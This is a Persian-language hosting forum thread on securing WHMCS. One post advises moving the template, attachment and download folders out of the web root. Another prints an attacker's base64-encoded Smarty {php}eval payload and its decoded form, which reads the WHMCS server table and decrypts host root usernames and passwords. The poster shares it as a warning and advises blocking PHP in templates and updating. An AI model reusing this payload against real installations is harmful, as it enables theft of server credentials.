نمایش نتایج: از شماره 1 تا 10 , از مجموع 33

موضوع: آموزش رفع مشکل امنیتی whmcs

Hybrid View

پست قبلی پست قبلی   پست بعدی پست بعدی
  1. #1
    عضو انجمن hamidjan آواتار ها
    تاریخ عضویت
    Mar 2010
    محل سکونت
    PartoData.com
    نوشته ها
    236
    تشکر تشکر کرده 
    154
    تشکر تشکر شده 
    296
    تشکر شده در
    195 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    سه تا پوشه گفته شده رو نباید توی پوشه a قرار بدید.
    فرض کنید سه پوشه این ها هستند:
    $templates_compiledir = "/home/hamid/public_html/client/templates_c/";
    $attachments_dir = "/home/
    hamid/public_html/client/attachments/";
    $downloads_dir = "/home/
    hamid/public_html/client/downloads/";

    مثلا whmcs شما هست:
    /home/hamid/public_html/client

    حالا اون سه پوشه رو میزارید توی آدرس زیر:
    home/hamid
    و در فایل configuration.php هم کدهای گفته شده رو میزارید:

    $templates_compiledir = "/home/hamid/templates_c/";
    $attachments_dir = "/home/
    hamid/attachments/";
    $downloads_dir = "/home/
    hamid/downloads/";
    شرکت پرتو فرا رایان ، ارائه دهنده سرویس های میزبانی وب ، ثبت دامنه ، نمایندگی هاست و دامنه ، طراحی وب و...

    PartoData.com
    [+]
    ,Services : WebHosting , Domain Registration , Reseller , FileHosting [+]
    Server Locations : Iran , UK [+]

  2. تعداد تشکر ها ازhamidjan به دلیل پست مفید


  3. #2
    کاربر اخراج شده
    تاریخ عضویت
    Jan 2010
    نوشته ها
    116
    تشکر تشکر کرده 
    1
    تشکر تشکر شده 
    103
    تشکر شده در
    72 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    سلام و خسته نباشید امروز متوجه شدم یکی از دوستان عزیزمون بازم یه کد جدید پیدا کرده که نیمه کاره کپی کرده ولی برای شما هم میگذارم تا با اون آشنا بشید این کد بیس 64 شده اش هست

    {php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1c mF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSg iU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kd GV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9 TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcc lxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF 1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzc yddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHl wZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2Z SddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0 KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sI CRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4 iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2Z SAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWU gJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwY WRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR 1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkI CRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKio qKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0Z Xh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIT1N UIFJPT1RTICMjIyMjIyMjIyM

    که بعد از کد گشای تقریبا یه همچین چیزی میشه

    zm^r^
    include('configuration.php');

    $query = mysql_query("SELECT * FROM tblservers");
    $text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
    while($v = mysql_fetch_array($query)) {

    $ipaddress = $v['ipaddress'];
    $username = $v['username'];
    $type = $v['type'];
    $active = $v['active'];
    $hostname = $v['hostname'];


    $password = decrypt ($v['password'], $cc_encryption_hash);

    $text=$text."Type $type\r\n";
    $text=$text."Active $active\r\n";
    $text=$text."Hostname $hostname\r\n";
    $text=$text."Ip $ipaddress\r\n";
    $text=$text."Username $username\r\n";
    $text=$text."Password $password\r\n************************************* *\r\n";


    }
    $text=$text."\r\n######################### HOST ROOTS ##########

    اگه به کدش توجه کنید با شامل کردن فایل کانفیگ از تیبل سرور میخواد یوزر و پسورد هاست ها رو به دست بیاره

    همون طوری که در این سایت هم خواندید با بلوک کردن php و آپدیت به آخرین ورژن میشه جلوی این جور ایمیل ها رو گرفت .
    جالب این جاست که هم وطنان خودمون میان این کارها رو انجام میدن .
    با تشکر از مدیریت وب هاستینگ تالک . مرادپور

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. شراکت در 2 سایت (آموزشی آرایشی - آموزشی امنیتی )
    توسط 666regab در انجمن به دنبال کارمند هستم
    پاسخ ها: 0
    آخرين نوشته: February 26th, 2016, 15:44
  2. پاسخ ها: 8
    آخرين نوشته: February 2nd, 2014, 14:42
  3. این کارای امنیتی whmcs 5.2 چیه ؟
    توسط mohammad73 در انجمن سوالات و مشکلات
    پاسخ ها: 1
    آخرين نوشته: October 18th, 2013, 01:36

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •